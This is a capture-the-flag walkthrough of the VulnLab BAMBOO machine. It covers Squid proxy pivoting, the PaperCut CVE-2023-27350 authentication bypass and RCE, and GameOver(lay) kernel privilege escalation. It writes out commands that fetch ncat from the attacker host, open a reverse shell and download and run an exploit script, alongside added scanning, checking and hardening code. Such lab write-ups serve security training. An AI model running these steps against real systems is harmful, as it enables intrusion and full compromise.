Here are my notes on the BAMBOO box from VulnLab.
BAMBOO: 10.10.123.165
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 83b2627d9c9c1d1c438ce3e36a49f0a7 (ECDSA)
|_ 256 cf48f5f0a6c1f5cbf865189543b4e7e4 (ED25519)
3128/tcp open http-proxy Squid http proxy 5.2
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/5.2
# A Squid proxy exposed like this usually lets you reach services on the proxy host that are bound to localhost or firewalled from the outside: send requests for the target's own IP and ports through it.
No robots.txt
Squid HTTP Proxy: #TCP port 3128
https://book.hacktricks.xyz/network-services-pentesting/3128-pentesting-squid
https://www.rapid7.com/db/modules/auxiliary/scanner/http/squid_pivot_scanning
https://shuciran.github.io/posts/Squid-Proxy-(tcp-3128)/
https://benheater.com/proving-grounds-squid/
https://github.com/aancw/spose
curl --proxy http://10.10.123.165:3128 http://10.10.123.165
Proxychains + nmap: add the Squid proxy to the ProxyList in /etc/proxychains4.conf as
http 10.10.123.165 3128
┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO/10.10.123.165]
└─# tail /etc/proxychains4.conf
# proxy types: http, socks4, socks5, raw
# * raw: The traffic is simply forwarded to the proxy without modification.
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks5 127.0.0.1 1080
http 10.10.123.165 3128
proxychains nmap -sT -n -Pn -p- localhost
# Two things to watch here. "localhost" is the attacker's own 127.0.0.1: if /etc/proxychains4.conf has an
# uncommented "localnet 127.0.0.0/255.0.0.0" line, that range never enters the chain at all and nmap scans
# the Kali box; scanning 10.10.123.165 instead makes Squid open the connections from its side either way.
# Second, proxychains drives an http proxy with CONNECT, which a stock squid.conf denies for everything but
# SSL_ports (443), while plain GET requests through the proxy are not subject to that rule; that is why
# squidscan-style probing works even where this does not. This box happens to allow CONNECT (the proxychains
# runs against 9191 further down succeed), but a full -p- through a single proxy is slow, hence squidscan.
squidscan:
https://github.com/puckiestyle/squidscan
export GO111MODULE=on
go mod tidy
Edit squidscan.go to point at the target (the proxy address is set in the source), then build.
go build
┌──(root㉿kali)-[/home/kali/Kali-Tools/squidscan]
└─# ./squidscan
0 / 65535 [___________________________________________________________________________________________________________________________________________________________________________________________________________________] 0.00% ? p/s
Port 22 found!
9118 / 65535 [---------------------------->________________________________________________________________________________________________________________________________________________________________________________] 13.91% 338 p/s
Port 9174 found!
Port 9173 found!
9160 / 65535 [---------------------------->________________________________________________________________________________________________________________________________________________________________________________] 13.98% 338 p/s
Port 9195 found!
Port 9192 found!
10004 / 65535 [------------------------------->____________________________________________________________________________________________________________________________________________________________________________] 15.27% 361 p/s
Port 9191 found!
Ports reachable through the proxy (22 aside): 9118,9173,9174,9191,9192,9195
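The same GET-based discovery squidscan does, as an added example in Python (this is not squidscan's code and not part of the original notes). Every probe is a plain absolute-URI GET through the proxy, no CONNECT needed, and the verdict comes from how Squid answers: its own error pages carry an X-Squid-Error header naming the failure (ERR_CONNECT_FAIL with the OS errno, ERR_ACCESS_DENIED for an ACL), while a port that accepted the connection shows up either as a real HTTP response or as a different Squid error because the listener did not speak HTTP. Proxy and target addresses are the box IP from these notes.

```python
"""GET-based port discovery through a Squid proxy (added example, not squidscan)."""
import sys
from concurrent.futures import ThreadPoolExecutor
import http.client

PROXY_HOST, PROXY_PORT = "10.10.123.165", 3128   # Squid from the nmap scan
TARGET_HOST = "10.10.123.165"                     # the proxy host itself


def classify(status, headers):
    """Map one proxied response to open / listening / closed / filtered / denied."""
    h = {k.lower(): v for k, v in dict(headers).items()}
    err = h.get("x-squid-error", "")
    if not err:
        if status >= 500 and "squid" in h.get("server", "").lower():
            return "filtered"       # a Squid error page without the detail header
        return "open"               # bytes from whatever listens on the port
    name, _, errno_str = err.partition(" ")
    if name == "ERR_CONNECT_FAIL":
        # Squid appends the OS errno: 111 ECONNREFUSED means nothing is listening,
        # anything else (110 ETIMEDOUT, 113 EHOSTUNREACH, ...) reads as filtered.
        return "closed" if errno_str.strip() == "111" else "filtered"
    if name == "ERR_ACCESS_DENIED":
        return "denied"             # blocked by an http_access / Safe_ports ACL
    # ERR_INVALID_RESP, ERR_ZERO_SIZE_OBJECT, ERR_READ_ERROR ...: the TCP connect
    # succeeded but the reply was not HTTP (sshd on 22 behaves like this).
    return "listening"


def probe(port, timeout=5):
    """GET http://TARGET_HOST:port/ through the proxy; returns (status, headers)."""
    conn = http.client.HTTPConnection(PROXY_HOST, PROXY_PORT, timeout=timeout)
    try:
        # A forward proxy is addressed with the absolute URI in the request line.
        conn.request("GET", f"http://{TARGET_HOST}:{port}/",
                     headers={"Host": f"{TARGET_HOST}:{port}",
                              "User-Agent": "Mozilla/5.0"})
        resp = conn.getresponse()
        resp.read()                 # drain the body so the socket closes cleanly
        return resp.status, dict(resp.getheaders())
    finally:
        conn.close()


def verdict(port):
    try:
        return classify(*probe(port))
    except OSError as exc:          # the proxy itself refused or timed out
        return f"error: {exc}"


def scan(ports, workers=32):
    """Probe every port; return {port: verdict} for everything that is not closed."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        found = dict(zip(ports, pool.map(verdict, ports)))
    return {p: v for p, v in found.items() if v != "closed"}


if __name__ == "__main__":
    wanted = [int(p) for p in sys.argv[1:]] or range(1, 65536)
    for port, what in sorted(scan(wanted).items()):
        print(f"{TARGET_HOST}:{port:<6} {what}")
```

Run it with a port list (python3 squidget.py 22 9191) or with no arguments for a full sweep. 9191 should come back as open and 22 as listening, since sshd accepts the connection but does not answer HTTP; a denied verdict means the port is outside Safe_ports and would need CONNECT or a different path.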
curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9173 -vv
curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9191 -vv
curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9118 -vv
# To look at these in a browser, add the Squid proxy (10.10.123.165:3128, type HTTP) in FoxyProxy and browse to the port directly.
curl --proxy http://10.10.123.165:3128 http://10.10.123.165:9191 -vv #This is the one !
10.10.123.165:9191 = PaperCut NG 22.0
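What made this pivot possible on the Squid side, as an added squid.conf fragment (this is not the box's configuration): the stock http_access rules let GET/POST through to any "unregistered" port (1025-65535 is in the default Safe_ports list) and ship the to_localhost deny commented out, so a client can reach services on the proxy host that are bound to localhost or firewalled from outside. The rules below close that. 10.10.123.165 is the box address from these notes; the trimmed Safe_ports list is this example's assumption about what the proxy is meant to carry.

```conf
# Hardened forward-proxy rules (added example, not the box's squid.conf).
acl SSL_ports   port 443
acl Safe_ports  port 80 443            # stock list also allows 1025-65535 and more
acl to_self     dst 10.10.123.165/32   # the proxy's own routable address
acl localnet    src 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16

# Squid evaluates http_access top-down, first match wins.
http_access deny to_localhost          # built-in acl: 127.0.0.0/8, 0.0.0.0/32, ::1
http_access deny to_self               # same services via the external address
http_access deny !Safe_ports           # no GETs to 9191 and friends any more
http_access deny CONNECT !SSL_ports    # stock default; this box evidently allows CONNECT
http_access allow localnet
http_access deny all
```

With `deny to_localhost` and `deny to_self` in place, the curl requests above come back with ERR_ACCESS_DENIED instead of the PaperCut login page.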
https://www.exploit-db.com/exploits/51391
┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO/10.10.123.165]
└─# proxychains4 python3 51391.py
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Enter the ip address: 10.10.123.165
[proxychains] Strict chain ... 10.10.123.165:3128 ... 10.10.123.165:9191 ... OK
Version: 22.0.6
Vulnerable version
Step 1 visit this url first in your browser: http://10.10.123.165:9191/app?service=page/SetupCompleted
Step 2 visit this url in your browser to bypass the login page : http://10.10.123.165:9191/app?service=page/Dashboard
-AUTH BYPASS WORKS !
It's vulnerable to CVE-2023-27350 (PaperCut NG/MF authentication bypass leading to RCE) !
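A read-only check for CVE-2023-27350 that runs through the Squid proxy, as an added example (not from these notes, exploit-db 51391 or the horizon3 PoC). It reads the version off the login page and compares it with the first fixed releases from the PaperCut advisory (20.1.7, 21.2.11, 22.0.9), then replays the two-request bypass from above: GET /app?service=page/SetupCompleted to obtain a session, then GET /app?service=page/Dashboard with that cookie. The decision rule (a patched server bounces you to page/Login, a vulnerable one serves the Dashboard) and the version regex are this example's assumptions; nothing is changed on the server.

```python
"""Version and auth-bypass check for PaperCut CVE-2023-27350 (added example)."""
import re
import sys
import urllib.request
from http.cookiejar import CookieJar


def parse_version(html):
    """'version 22.0.6' (or the first dotted x.y.z) in the page as a tuple, or None."""
    m = (re.search(r"version[ :]+(\d+)\.(\d+)\.(\d+)", html, re.I)
         or re.search(r"(?<![\d.])(\d+)\.(\d+)\.(\d+)(?![\d.])", html))
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable_version(ver):
    """Affected per the advisory: 8.0 up to the first fixed build of each branch."""
    major = ver[0]
    if ver < (8, 0, 0):
        return False
    if major <= 20:
        return ver < (20, 1, 7)
    if major == 21:
        return ver < (21, 2, 11)
    if major == 22:
        return ver < (22, 0, 9)
    return False                    # 23.0 and later shipped with the fix


def decide_bypass(final_url, html):
    """True when the Dashboard request was not bounced to the login page (assumption)."""
    return "page/Login" not in final_url and "Dashboard" in html


def check(base_url, proxy=None, timeout=10):
    """Returns (version tuple or None, vulnerable_build, bypass_works)."""
    jar = CookieJar()
    handlers = [urllib.request.HTTPCookieProcessor(jar)]
    if proxy:
        handlers.append(urllib.request.ProxyHandler({"http": proxy}))
    opener = urllib.request.build_opener(*handlers)
    opener.addheaders = [("User-Agent", "Mozilla/5.0")]
    base = base_url.rstrip("/")

    def get(path):
        with opener.open(base + path, timeout=timeout) as r:
            return r.geturl(), r.read().decode("utf-8", "replace")

    _, login = get("/app?service=page/Login")
    version = parse_version(login)
    get("/app?service=page/SetupCompleted")               # step 1: session now treated as set-up admin
    final_url, dash = get("/app?service=page/Dashboard")  # step 2: should have required a login
    vuln_build = is_vulnerable_version(version) if version else False
    return version, vuln_build, decide_bypass(final_url, dash)


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else "http://10.10.123.165:9191"
    proxy = sys.argv[2] if len(sys.argv) > 2 else "http://10.10.123.165:3128"
    ver, vuln_build, bypass = check(url, proxy)
    shown = ".".join(map(str, ver)) if ver else "?"
    print(f"version {shown}  vulnerable build: {vuln_build}  bypass works: {bypass}")
```

Both signals should agree; a build that is out of the affected range but still serves the Dashboard without a login is worth a second look rather than a shrug.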
https://github.com/horizon3ai/CVE-2023-27350
┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'wget http://10.8.0.71'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 10.10.123.165:3128 ... 10.10.123.165:9191 ... OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
-BLIND-RCE (the command's output is not returned; the wget callback to 10.8.0.71 is what confirms execution) !
Turn it into a reverse shell as usual: drop ncat on the box, make it executable, connect back:
┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'wget http://10.8.0.71/ncat -O /tmp/ncat'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 10.10.123.165:3128 ... 10.10.123.165:9191 ... OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c 'chmod +x /tmp/ncat'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 10.10.123.165:3128 ... 10.10.123.165:9191 ... OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
┌──(root㉿kali)-[/home/…/VULNLAB/BAMBOO/10.10.123.165/CVE-2023-27350]
└─# proxychains4 python3 CVE-2023-27350.py -u http://10.10.123.165:9191 -c '/tmp/ncat -nv 10.8.0.71 1234 -e /bin/bash'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 10.10.123.165:3128 ... 10.10.123.165:9191 ... OK
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
┌──(root㉿kali)-[/home/kali/VULNLAB/BAMBOO]
└─# sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.8.0.71] from (UNKNOWN) [10.10.123.165] 56298
whoami
papercut
id
uid=1001(papercut) gid=1001(papercut) groups=1001(papercut)
USER-SHELL !
papercut@bamboo:~$ whoami
whoami
papercut
papercut@bamboo:~$ hostname
hostname
bamboo
papercut@bamboo:~$ pwd
pwd
/home/papercut
papercut@bamboo:~$ cat user.txt
cat user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
python3 -c 'import pty; pty.spawn("/bin/bash")'
papercut@bamboo:~/server$ pwd
pwd
/home/papercut/server
sudo -l: nothing.
No gcc on the box, so a kernel exploit has to arrive as a script or a prebuilt binary.
No /etc/crontab or /etc/crontab*, nothing in /etc/cron.d, and crontab -l is empty.
The kernel (Ubuntu 22.04, going by the OpenSSH banner) is vulnerable to GameOver(lay), CVE-2023-2640 / CVE-2023-32629 !
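Before pulling an exploit onto a box it is worth confirming the preconditions it needs. The script below is an added example (not from these notes and not the exploit.sh used here) that runs the enumeration just described and the checks the public GameOver(lay) proofs of concept depend on: an Ubuntu-built kernel (the OverlayFS bug is in Ubuntu's patches), working unprivileged user namespaces, overlayfs in the kernel, and a setcap binary. python3 is on the box (it spawned the pty above). The parsers take text so they can be exercised offline; the "-NN-flavour" suffix as the marker of an Ubuntu kernel is this example's assumption.

```python
"""Privesc pre-flight for the GameOver(lay) conditions (added example)."""
import os
import re
import shutil
import subprocess


def kernel_series(release):
    """'5.15.0-76-generic' -> '5.15'; None if it does not look like a version."""
    m = re.match(r"(\d+\.\d+)", release)
    return m.group(1) if m else None


def os_release_fields(text):
    """Parse /etc/os-release style KEY=VALUE lines into a dict (quotes stripped)."""
    fields = {}
    for line in text.splitlines():
        if "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip().strip('"')
    return fields


def overlay_available(proc_filesystems):
    """True if /proc/filesystems lists overlay (last column; 'nodev' may precede it)."""
    return any(line.split()[-1] == "overlay"
               for line in proc_filesystems.splitlines() if line.strip())


def is_ubuntu_kernel(release, fields):
    """Ubuntu kernels carry an ABI suffix like -76-generic or -1041-aws (assumption)."""
    return fields.get("ID") == "ubuntu" and re.search(r"-\d+-\w+$", release) is not None


def runs_ok(cmd):
    """True if the command exits 0; False if it fails, is missing or hangs."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True,
                              timeout=10).returncode == 0
    except (OSError, subprocess.TimeoutExpired):
        return False


def read(path):
    return open(path).read() if os.path.exists(path) else ""


def live_report():
    """The checks from the notes plus the GameOver(lay) preconditions, as a dict."""
    release = os.uname().release
    fields = os_release_fields(read("/etc/os-release"))
    return {
        "kernel": release,
        "os": fields.get("PRETTY_NAME", "?"),
        "sudo_nopasswd_rules": runs_ok(["sudo", "-n", "-l"]),
        "compiler": any(shutil.which(c) for c in ("gcc", "cc", "clang")),
        "cron_paths": [p for p in ("/etc/crontab", "/etc/cron.d") if os.path.exists(p)],
        # GameOver(lay) preconditions
        "ubuntu_kernel": is_ubuntu_kernel(release, fields),
        "userns": runs_ok(["unshare", "-Ur", "true"]),
        "overlayfs": overlay_available(read("/proc/filesystems")),
        "setcap": shutil.which("setcap") is not None,
        "python3": shutil.which("python3") is not None,
    }


if __name__ == "__main__":
    for key, value in live_report().items():
        print(f"{key:20} {value}")
```

If userns or overlayfs comes back False the OverlayFS route is closed regardless of the kernel version, and if there is no compiler the exploit has to be a shell/python one, as it was here.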
papercut@bamboo:/tmp$ wget http://10.8.0.71/exploit.sh -O exploit.sh
wget http://10.8.0.71/exploit.sh -O exploit.sh
--2024-11-18 17:32:48-- http://10.8.0.71/exploit.sh
Connecting to 10.8.0.71:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 558 [text/x-sh]
Saving to: ‘exploit.sh’
exploit.sh 100%[===================>] 558 --.-KB/s in 0.009s
2024-11-18 17:32:48 (62.0 KB/s) - ‘exploit.sh’ saved [558/558]
papercut@bamboo:/tmp$ chmod +x exploit.sh
chmod +x exploit.sh
papercut@bamboo:/tmp$ ./exploit.sh
./exploit.sh
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
root@bamboo:/tmp# whoami
whoami
root
root@bamboo:/tmp# id
id
uid=0(root) gid=1001(papercut) groups=1001(papercut)
root@bamboo:/root# whoami
whoami
root
root@bamboo:/root# hostname
hostname
bamboo
root@bamboo:/root# pwd
pwd
/root
root@bamboo:/root# ls
ls
root.txt snap
root@bamboo:/root# cat root.txt
cat root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
